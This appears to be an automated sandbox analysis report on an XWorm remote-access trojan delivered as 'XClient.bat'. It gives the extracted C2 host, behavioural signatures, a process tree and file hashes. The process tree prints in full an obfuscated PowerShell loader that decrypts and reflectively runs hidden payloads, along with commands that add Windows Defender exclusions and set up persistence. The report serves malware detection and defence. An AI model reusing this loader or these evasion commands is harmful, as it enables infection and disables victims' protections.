Analysis
-
max time kernel
106s -
max time network
125s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-05-2024 14:09
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win11-20240508-en
General
-
Target
XClient.bat
-
Size
302KB
-
MD5
7a5f5944302b8298714b56ae2f138b7c
-
SHA1
669b42f2f6e76895899d84d5ad7a12f23d951f13
-
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
-
SHA512
73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
SSDEEP
6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5008-48-0x000001806F700000-0x000001806F71A000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 16 5008 powershell.exe 17 5008 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3084 powershell.exe 4340 powershell.exe 1796 powershell.exe 3252 powershell.exe 3436 powershell.exe 5008 powershell.exe 2352 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3236 timeout.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2352 powershell.exe 2352 powershell.exe 3436 powershell.exe 3436 powershell.exe 5008 powershell.exe 5008 powershell.exe 3084 powershell.exe 3084 powershell.exe 4340 powershell.exe 4340 powershell.exe 1796 powershell.exe 1796 powershell.exe 3252 powershell.exe 3252 powershell.exe 5008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeSystemEnvironmentPrivilege 3436 powershell.exe Token: SeRemoteShutdownPrivilege 3436 powershell.exe Token: SeUndockPrivilege 3436 powershell.exe Token: SeManageVolumePrivilege 3436 powershell.exe Token: 33 3436 powershell.exe Token: 34 3436 powershell.exe Token: 35 3436 powershell.exe Token: 36 3436 powershell.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeSystemEnvironmentPrivilege 3436 powershell.exe Token: SeRemoteShutdownPrivilege 3436 powershell.exe Token: SeUndockPrivilege 3436 powershell.exe Token: SeManageVolumePrivilege 3436 powershell.exe Token: 33 3436 powershell.exe Token: 34 3436 powershell.exe Token: 35 3436 powershell.exe Token: 36 3436 powershell.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeSystemEnvironmentPrivilege 3436 powershell.exe Token: SeRemoteShutdownPrivilege 3436 powershell.exe Token: SeUndockPrivilege 3436 powershell.exe Token: SeManageVolumePrivilege 3436 powershell.exe Token: 33 3436 powershell.exe Token: 34 3436 powershell.exe Token: 35 3436 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 5008 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.execmd.exedescription pid process target process PID 4008 wrote to memory of 2352 4008 cmd.exe powershell.exe PID 4008 wrote to memory of 2352 4008 cmd.exe powershell.exe PID 2352 wrote to memory of 3436 2352 powershell.exe powershell.exe PID 2352 wrote to memory of 3436 2352 powershell.exe powershell.exe PID 2352 wrote to memory of 3616 2352 powershell.exe WScript.exe PID 2352 wrote to memory of 3616 2352 powershell.exe WScript.exe PID 3616 wrote to memory of 3656 3616 WScript.exe cmd.exe PID 3616 wrote to memory of 3656 3616 WScript.exe cmd.exe PID 3656 wrote to memory of 5008 3656 cmd.exe powershell.exe PID 3656 wrote to memory of 5008 3656 cmd.exe powershell.exe PID 5008 wrote to memory of 3084 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 3084 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 4340 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 4340 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 1796 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 1796 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 3252 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 3252 5008 powershell.exe powershell.exe PID 5008 wrote to memory of 4904 5008 powershell.exe schtasks.exe PID 5008 wrote to memory of 4904 5008 powershell.exe schtasks.exe PID 5008 wrote to memory of 4580 5008 powershell.exe schtasks.exe PID 5008 wrote to memory of 4580 5008 powershell.exe schtasks.exe PID 5008 wrote to memory of 1160 5008 powershell.exe cmd.exe PID 5008 wrote to memory of 1160 5008 powershell.exe cmd.exe PID 1160 wrote to memory of 3236 1160 cmd.exe timeout.exe PID 1160 wrote to memory of 3236 1160 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_964_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_964.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_964.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_964.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_964.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_964.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:4904
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"6⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA7.tmp.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:3236
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD52ccec3db8c28304d166b116d58c04279
SHA1c463583f3bab40b2f7e057dc8708b4530bd110e9
SHA256d2a0cb8e1dab562542360b056514d6e35a0f4c87404fb8d0e9822c55dfeebcf3
SHA51212230f4b6c1ab047b1b701d9a320bfc2d5bfab87bf66c54d656c42884be75567b5024aee4b5c0c75e666a2dd1b140850323e2ec46d1dd756f8fcfd8cfa1f0f78
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize
944B
MD56f0e62045515b66d0a0105abc22dbf19
SHA1894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a
-
Filesize
944B
MD534c8b93dd58a4703db0d6dd86bb21d70
SHA1b53aa49b882070b857951b6638d6da3a03ac2f56
SHA25634b95e4d12196f68f7a030b98190fda89c34b696251ab9ed831e48d983896898
SHA512bba4a86b8a66104ed21fd58717168cdf68b93c801a94ec65e25c2b66c1b9354b9e7c1c01cadde451948e072d96c3fa4994c94ef33aeff9b603e7b5d82f7111e7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
169B
MD5cdfa2cbc82657a00cae9aaba46c0ea36
SHA1432fe15f89ebe0e75f0f39aff4990ca136a856fa
SHA2565db3674f39627900841db0284230a38f3d90292b678dc343a3227276758a3010
SHA51206987d0746c045cb81ea394ff777aeafa46d3e2b2ed1f93ae18b4860a689ad549ec87d93ab8929aa851bc8a7d47427508047256dd3620d7c5e76c1912649c922
-
Filesize
302KB
MD57a5f5944302b8298714b56ae2f138b7c
SHA1669b42f2f6e76895899d84d5ad7a12f23d951f13
SHA2563f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
SHA51273049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
Filesize
115B
MD5e2839c6e276e0e1e65cd343d3afd8423
SHA1853ffa8a050c4b9c608dd0f85ad30fdf15b3ac5c
SHA256df5ccd14db28ca84f195d87231dfe9ebead2ee1d30142691ef6973310bdd4056
SHA512039510ae8794cb33dfedf7197adbbce4ece3411cdea1094261df9f84ae05a4143dbbbe993ab9084fb353e4f90d756704e58e114d1c110f7b9d394ebc4bc80874